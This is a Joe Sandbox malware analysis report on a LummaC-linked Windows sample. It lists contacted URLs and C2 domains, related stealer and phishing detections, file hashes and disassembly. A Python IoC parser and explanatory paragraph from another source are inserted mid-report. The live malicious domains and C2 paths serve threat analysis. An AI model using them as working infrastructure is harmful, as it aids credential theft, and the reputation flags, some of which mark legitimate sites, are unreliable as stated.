                                                                                                      https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://store.steampowered.com/;BitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettinSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                                                        unknown
                                                                                                        https://management.azure.com/https://managedhsm.azure.net/https://servicebus.azure.net/https://databSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                                                          unknown
                                                                                                          https://store.steampowered.com/about/BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://manage.windowsazure.us/publishsettings/indexConvertSecurityDescriptorToStringSecurityDescripSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                                                              unknown
                                                                                                              https://help.steampowered.com/en/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://stamppreewntnq.shop/uxBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
Name: https://steamcommunity.com/market/
Source:
• BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://store.steampowered.com/news/
Source:
• BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://community.akamai.steamstatic.com/
Source:
• BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://steambroadcast.akamaized.naC
Source:
• BitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://www.cloudflare.com/learning/access-m
Source:
• BitLockerToGo.exe, 00000002.00000003.1636364105.0000000000607000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comRequest
Source:
• SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
Malicious: false
Reputation: unknown

Name: http://store.steampowered.com/subscriber_agreement/
Source:
• BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://stamppreewntnq.shop/Kx
Source:
• BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source:
• BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source:
• BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://locatedblsoqp.shop/apiBY
Source:
• BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Reputation: unknown

Name: https://recaptcha.net/recaptcha/;
Source:
• BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source:
• BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://sergei-esenin.com/apiU
Source:
• BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://steamcommunity.com/discussions/
Source:
• BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://store.steampowered.com/stats/
Source:
• BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp
• BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://stamppreewntnq.shop/
Source:
• BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown
IP              Domain              Country         ASN    ASN Name            Malicious
104.21.53.8     sergei-esenin.com   United States   13335  CLOUDFLARENET (US)  true
188.114.96.3    nippydxmnwquo.shop  European Union  13335  CLOUDFLARENET (US)  true
104.102.49.254  steamcommunity.com  United States   16625  AKAMAI-AS (US)      true
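The contacted-URL entries above arrive flattened: the URL, the process name and memory-dump file name(s) the string was recovered from, and the Malicious flag are run together on one line. The Python below is an added example, not part of this Joe Sandbox report or of Joe Sandbox itself. It splits those entries back into records, using the report's own process names as the URL/source boundary (so a truncated string such as "akamaized.naC" is preserved rather than guessed at), decodes the first fields of each `.sdmp` name (the fourth field is taken to be the region base address, an assumption that matches the values on this page; the remaining fields are kept opaque), and groups hosts by the dump region they were found in. The sample entries are copied from this page's URL table; the `KNOWN_PROCS` set is taken from the source column. Because the IP table shows all three contacted addresses on Cloudflare and Akamai edges, the block list it produces is a hostname list, not IPs.

```python
"""Re-parse flattened Joe Sandbox 'contacted URLs' entries into IoC records.

Added example (not part of the report or of Joe Sandbox). A flattened entry is
    <URL><proc>, <dump ref>[, <proc>, <dump ref>]...<true|false>
where the trailing boolean is the report's Malicious column.
"""
import html
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# Dump file names on this page: eight dot-separated fields plus ".sdmp".
SDMP_RE = r"[0-9A-F]{8}\.[0-9A-F]{8}\.\d+\.[0-9A-F]{16}(?:\.[0-9A-F]{8}){4}\.sdmp"

# Process names that appear in the Source column of this report.
KNOWN_PROCS = {"BitLockerToGo.exe", "SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe"}

# Constructed input: entries copied verbatim from this report's URL table.
ENTRIES = [
    "https://steamcommunity.com/market/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://stamppreewntnq.shop/KxBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://locatedblsoqp.shop/apiBYBitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmptrue",
    "https://sergei-esenin.com/apiUBitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://stamppreewntnq.shop/BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comRequestSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse",
]


@dataclass(frozen=True)
class DumpRef:
    process_index: int  # field 1: sandbox index of the dumped process
    dump_type: int      # field 2: kept as an opaque code (not defined on the page)
    base: int           # field 4: region base address (assumption, matches page values)


@dataclass
class UrlRecord:
    url: str
    host: str
    sources: list       # [(process name, DumpRef or None), ...]
    malicious: bool


def parse_sdmp(ref):
    f = ref[: -len(".sdmp")].split(".")
    return DumpRef(int(f[0], 16), int(f[1], 16), int(f[3], 16))


def parse_entry(line, known_procs=KNOWN_PROCS):
    procs = "|".join(re.escape(p) for p in sorted(known_procs, key=len, reverse=True))
    item = rf"(?:{procs})(?:, {SDMP_RE})?"
    # Non-greedy URL: it ends at the first position where a known process name starts.
    m = re.fullmatch(rf"(?P<url>.+?)(?P<src>{item}(?:, {item})*)(?P<mal>true|false)", line)
    if m is None:
        raise ValueError(f"unrecognised entry: {line[:60]!r}")
    sources = [(proc, parse_sdmp(ref) if ref else None)
               for proc, ref in re.findall(rf"({procs})(?:, ({SDMP_RE}))?", m["src"])]
    url = html.unescape(m["url"])  # the HTML export leaves "&amp;" in query strings
    return UrlRecord(url, urlsplit(url).hostname or "", sources, m["mal"] == "true")


def parse_entries(lines, known_procs=KNOWN_PROCS):
    return [parse_entry(line, known_procs) for line in lines]


def blocklist(records):
    """Hosts the report flags as malicious, deduplicated (hostnames, not CDN IPs)."""
    return sorted({r.host for r in records if r.malicious and r.host})


def hosts_by_region(records):
    """Map (process index, base address) -> hosts whose strings sat in that region."""
    regions = defaultdict(set)
    for r in records:
        for _proc, ref in r.sources:
            if ref is not None:
                regions[(ref.process_index, ref.base)].add(r.host)
    return dict(regions)


def neighbours(records, host):
    """Hosts recovered from the same dump region(s) as `host`, excluding `host`."""
    out = set()
    for hosts in hosts_by_region(records).values():
        if host in hosts:
            out |= hosts
    out.discard(host)
    return out


if __name__ == "__main__":
    recs = parse_entries(ENTRIES)
    for r in recs:
        regions = ", ".join(f"proc{s.process_index}@{s.base:#x}" for _, s in r.sources if s)
        print(f"{'!' if r.malicious else ' '} {r.host:40} {regions or '(from sample file)'}")
    print("block:", blocklist(recs))
    print("same region as sergei-esenin.com:", neighbours(recs, "sergei-esenin.com"))
```

Only locatedblsoqp.shop carries the report's Malicious flag in the URL table, yet sergei-esenin.com (marked malicious in the IP table) and stamppreewntnq.shop were pulled from the same BitLockerToGo.exe heap region at 0x5C6000, while the Steam page material sits separately at 0x637000 and 0x62A000. Grouping by dump region is what turns one flagged entry into a candidate set worth reviewing; the Cloudflare and Akamai addresses themselves are shared edges and belong in a DNS or TLS SNI rule rather than an IP block.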
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532746
Start date and time: 2024-10-13 21:33:20 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@3/0@11/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 17
• Number of non-executed functions: 95
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, PID 6476 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
Time      Type             Description
15:34:52  API Interceptor  5x Sleep call for process: BitLockerToGo.exe modified
Match               Associated Sample Name / URL                 Detection   Threat Name                     Context
104.21.53.8         file.exe                                     malicious   LummaC
104.21.53.8         file.exe                                     malicious   LummaC
104.21.53.8         file.exe                                     malicious   LummaC
104.21.53.8         Set-up.exe                                   malicious   LummaC
104.21.53.8         file.exe                                     malicious   LummaC
104.21.53.8         file.exe                                     malicious   LummaC
104.21.53.8         file.exe                                     malicious   LummaC
104.21.53.8         file.exe                                     malicious   LummaC
104.21.53.8         file.exe                                     malicious   LummaC
104.21.53.8         Setup-Premium.exe                            malicious   LummaC
188.114.96.3        DRAFT DOC2406656.bat.exe                     malicious   Lokibot                         touxzw.ir/sirr/five/fre.php
188.114.96.3        lv961v43L3.exe                               malicious   DCRat, PureLog Stealer, zgRAT   863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
188.114.96.3        10092024150836 09.10.2024.vbe                malicious   FormBook                        www.airgame.store/ojib/
188.114.96.3        Hesap-hareketleriniz.exe                     malicious   FormBook                        www.cc101.pro/59fb/
188.114.96.3        octux.exe.exe                                malicious   Unknown                         servicetelemetryserver.shop/api/index.php
188.114.96.3        bX8NyyjOFz.exe                               malicious   FormBook                        www.rtprajalojago.live/2uvi/
188.114.96.3        lWfpGAu3ao.exe                               malicious   FormBook                        www.serverplay.live/71nl/
188.114.96.3        sa7Bw41TUq.exe                               malicious   FormBook                        www.cc101.pro/0r21/
188.114.96.3        E_receipt.vbs                                malicious   Unknown                         paste.ee/d/VO2TX
188.114.96.3        QUOTATION_OCTQTRA071244#U00faPDF.scr.exe     malicious   Snake Keylogger, VIP Keylogger  filetransfer.io/data-package/fOmsJ2bL/download
Match               Associated Sample Name / URL                                  Detection   Threat Name     Context
sergei-esenin.com   file.exe                                                      malicious   LummaC          104.21.53.8
sergei-esenin.com   file.exe                                                      malicious   LummaC          172.67.206.204
sergei-esenin.com   file.exe                                                      malicious   LummaC          172.67.206.204
sergei-esenin.com   file.exe                                                      malicious   LummaC          172.67.206.204
sergei-esenin.com   file.exe                                                      malicious   LummaC          104.21.53.8
sergei-esenin.com   file.exe                                                      malicious   LummaC          172.67.206.204
sergei-esenin.com   file.exe                                                      malicious   LummaC          172.67.206.204
sergei-esenin.com   Setup.exe                                                     malicious   LummaC          172.67.206.204
sergei-esenin.com   Setup.exe                                                     malicious   LummaC          172.67.206.204
sergei-esenin.com   file.exe                                                      malicious   LummaC          104.21.53.8
steamcommunity.com  file.exe                                                      malicious   LummaC          104.102.49.254
steamcommunity.com  file.exe                                                      malicious   LummaC          104.102.49.254
steamcommunity.com  SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe     malicious   Vidar, Xmrig    104.102.49.254
steamcommunity.com  https://steamcommunlty-gifts.com/s/HRAB                       malicious   Unknown         104.102.49.254
steamcommunity.com  https://steamcommunity-success.com/gift-card/9376695162       malicious   Unknown         104.102.49.254
steamcommunity.com  https://steamcommunlty-gifts.com/s/HRAB                       malicious   Unknown         104.102.49.254
steamcommunity.com  https://steamcommunity-success.com/gift-card/9376695162       malicious   Unknown         104.102.49.254
steamcommunity.com  file.exe                                                      malicious   LummaC          104.102.49.254
steamcommunity.com  file.exe                                                      malicious   LummaC          104.102.49.254
steamcommunity.com  https://steamcommunlty-gifts.com/s/HRAB                       malicious   Unknown         104.102.49.254
Match               Associated Sample Name / URL                                      Detection   Threat Name   Context
CLOUDFLARENET (US)  file.exe                                                          malicious   LummaC        104.21.53.8
CLOUDFLARENET (US)  https://fexegreuyauja-8124.vercel.app/mixc.html                   malicious   HTMLPhisher   172.67.75.166
CLOUDFLARENET (US)  https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.html    malicious   HTMLPhisher   104.17.25.14
CLOUDFLARENET (US)  https://onedoc3.pages.dev/                                        malicious   HTMLPhisher   172.67.69.226
CLOUDFLARENET (US)  http://iglawfirm.com/services/antai-fr/                           malicious   Unknown       104.17.25.14
CLOUDFLARENET (US)  https://www.iglawfirm.com/services/antai-fr/infospage.php         malicious   Unknown
                                                                                                                                                          • 104.17.24.14
                                                                                                                                                          http://bancolombia-personas-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.74.152
                                                                                                                                                          http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.26.12.205
                                                                                                                                                          http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                          • 104.16.124.96
                                                                                                                                                          https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.18.31.19
                                                                                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          https://fexegreuyauja-8124.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 172.67.75.166
                                                                                                                                                          https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 172.67.69.226
                                                                                                                                                          http://iglawfirm.com/services/antai-fr/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          https://www.iglawfirm.com/services/antai-fr/infospage.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.17.24.14
                                                                                                                                                          http://bancolombia-personas-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.74.152
                                                                                                                                                          http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.26.12.205
                                                                                                                                                          http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                          • 104.16.124.96
                                                                                                                                                          https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.18.31.19
                                                                                                                                                          AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunityv.com/redeemwalletcode/gift/514590383Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 88.221.169.65
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunityv.com/redeemwalletcode/gift/514590383Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 88.221.169.65
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          No context
                                                                                                                                                          No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 1.243849203671813
TrID:
• Win32 Executable (generic) a (10002005/4) 99.53%
• InstallShield setup (43055/19) 0.43%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
File size: 41'135'106 bytes
MD5: de577c633508c2bc5e7be2ad04bf34f3
SHA1: 7a88fa2b07e7ef10de364579235e37d40be949ed
SHA256: 84f11a69fc5ab994993203b7e262203b9a86e943a233a932f7230c98b86740f1
SHA512: 77f508f86bec3d2581e7c779b1b07aef1997ad3086298ab8d953b27f29cc7972e08a2b6fdc40e0a6b22d37935b436d5b83c0e7508be998b38653f051e9c644ed
SSDEEP: 49152:Rwqf9c1ikmTe48pTPFynKiOqya9W5KcR+s9fI8jU5+usWUgB+N:WqFMIe4nn6W5+uso
TLSH: C4973901FACB45F5E9471D3050A7A27F67316E098F24CB97EA507F2AF8B76911C3620A
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........P...............$..V......0 ........J...@..........................pV.......T...@................................
Icon Hash: 7aecd68ccad86810
Entrypoint: 0x472030
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 1
File Version Major: 6
File Version Minor: 1
Subsystem Version Major: 6
Subsystem Version Minor: 1
Import Hash: 1aae8bf580c846f39c71c05898e57e88
Instruction
jmp 00007F1C647F8520h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007F1C647D4856h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
